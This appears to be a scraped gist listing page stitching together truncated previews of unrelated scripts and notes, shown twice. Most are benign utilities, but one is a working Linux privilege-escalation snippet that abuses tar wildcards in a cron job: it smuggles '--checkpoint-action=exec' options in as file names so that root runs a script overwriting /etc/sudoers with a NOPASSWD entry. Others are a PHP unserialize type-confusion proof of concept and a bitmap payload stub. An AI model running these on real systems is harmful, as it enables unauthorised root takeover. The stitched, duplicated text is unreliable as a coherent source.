Alex santaklouse

## index.md

      
              1 file
            
          
              6 forks
            
          
              0 comments
            
          
              29 stars
            
          
                paj28
                / index.md
            
            
              Last active
              April 21, 2024 16:26
            
          
    Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.
Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/
A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

  
## wp-wordlist.sh
wp-wordlist()
{
    option="$1"
    if [[ "$option" == *"plugin"* ]]; then
        curl -s https://plugins.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
    elif [[ "$option" == *"theme"* ]]; then
     curl -s https://themes.svn.wordpress.org/ | tail -n +5 | sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' | grep -v "Powered by Apache" | sort -u
    fi
}

## CrossOver.sh
#!/usr/bin/env bash

# checck if pidof exists
PIDOF="$(which pidof)"
# and if not - install it
(test "${PIDOF}" && test -f "${PIDOF}") || brew install pidof

# find app in default paths
CO_PWD=~/Applications/CrossOver.app/Contents/MacOS
test -d "${CO_PWD}" || CO_PWD=/Applications/CrossOver.app/Contents/MacOS

## openssl_commands.md

      
              1 file
            
          
              85 forks
            
          
              5 comments
            
          
              268 stars
            
          
                Hakky54
                / openssl_commands.md
            
            
              Last active
              July 18, 2024 03:47
                — forked from p3t3r67x0/openssl_commands.md
            
              
                Some list of openssl commands for check and verify your keys
              
          
    OpenSSL 🔐

Install

Install the OpenSSL on Debian based systems
sudo apt-get install openssl

  
## firewall.sh
#!/usr/bin/env bash
set -o errexit
set -o errtrace

usage() {
  printf "\
macOS socketfilterfw decorator.

  firewall [-command] [args]

## linux_privesc_cron_tar_wildcard.txt
// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
echo 'echo "Defaults        env_reset" > /etc/sudoers' >> test.sh
echo 'echo "Defaults        mail_badpass" >> /etc/sudoers' >> test.sh
echo 'echo "Defaults        secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
echo 'echo "root    ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "%sudo   ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1

## bitchmap.py
#!/usr/bin/python3
#
#Based on: https://www.thelacunablog.com/open-command-prompt-ms-paint.html

import struct
from PIL import Image

def imagegen(s, path):
	# Fix header
	s = '\x00\x00\x0a\x0d\x0a\x0d' + s

## download-script.sh
#!/bin/bash
fileid="FILEIDENTIFIER"
filename="FILENAME"
curl -c ./cookie -s -L "https://drive.google.com/uc?export=download&id=${fileid}" > /dev/null
curl -Lb ./cookie "https://drive.google.com/uc?export=download&confirm=`awk '/download/ {print $NF}' ./cookie`&id=${fileid}" -o ${filename}

## README.md

      
              1 file
            
          
              40 forks
            
          
              1 comment
            
          
              157 stars
            
          
                FrankSpierings
                / README.md
            
            
              Last active
              January 20, 2024 20:45
            
              
                Linux Container Escapes and Hardening
              
          
    Container security notes

Internet references

Kernel and architecture


namespaces - overview of Linux namespaces
http://man7.org/linux/man-pages/man7/namespaces.7.html


mount_namespaces - overview of Linux mount namespaces


## test.php
<?php
$a = new stdClass; // handle = 1
$a->test = false;
echo('Property $a->test is: ');
var_dump($a->test);
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
echo('Property $a->test changed to: ');
var_dump($a->test);
	wp-wordlist()
	{
	option="$1"
	if [[ "$option" == "plugin" ]]; then
	curl -s https://plugins.svn.wordpress.org/ \| tail -n +5 \| sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' \| grep -v "Powered by Apache" \| sort -u
	elif [[ "$option" == "theme" ]]; then
	curl -s https://themes.svn.wordpress.org/ \| tail -n +5 \| sed -e 's/<[^>]*>//g' -e 's/\///' -e 's/ \+//gp' \| grep -v "Powered by Apache" \| sort -u
	fi
	}
	#!/usr/bin/env bash

	# checck if pidof exists
	PIDOF="$(which pidof)"
	# and if not - install it
	(test "${PIDOF}" && test -f "${PIDOF}") \|\| brew install pidof

	# find app in default paths
	CO_PWD=~/Applications/CrossOver.app/Contents/MacOS
	test -d "${CO_PWD}" \|\| CO_PWD=/Applications/CrossOver.app/Contents/MacOS
	#!/usr/bin/env bash
	set -o errexit
	set -o errtrace

	usage() {
	printf "\
	macOS socketfilterfw decorator.

	firewall [-command] [args]
	// https://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/
	// This will replace sudoers. Add your user to <INSERT YOUR USER HERE>
	echo 'echo "Defaults env_reset" > /etc/sudoers' >> test.sh
	echo 'echo "Defaults mail_badpass" >> /etc/sudoers' >> test.sh
	echo 'echo "Defaults secure_path=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\" ">> /etc/sudoers' >> test.sh
	echo 'echo "root ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
	echo 'echo "%sudo ALL=(ALL:ALL) ALL" >> /etc/sudoers' >> test.sh
	echo 'echo "<INSERT YOUR USER HERE> ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> test.sh
	echo "" > "--checkpoint-action=exec=sh test.sh"
	echo "" > --checkpoint=1
	#!/usr/bin/python3
	#
	#Based on: https://www.thelacunablog.com/open-command-prompt-ms-paint.html

	import struct
	from PIL import Image

	def imagegen(s, path):
	# Fix header
	s = '\x00\x00\x0a\x0d\x0a\x0d' + s
	#!/bin/bash
	fileid="FILEIDENTIFIER"
	filename="FILENAME"
	curl -c ./cookie -s -L "https://drive.google.com/uc?export=download&id=${fileid}" > /dev/null
	curl -Lb ./cookie "https://drive.google.com/uc?export=download&confirm=`awk '/download/ {print $NF}' ./cookie`&id=${fileid}" -o ${filename}
	<?php
	$a = new stdClass; // handle = 1
	$a->test = false;
	echo('Property $a->test is: ');
	var_dump($a->test);
	$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
	echo('Property $a->test changed to: ');
	var_dump($a->test);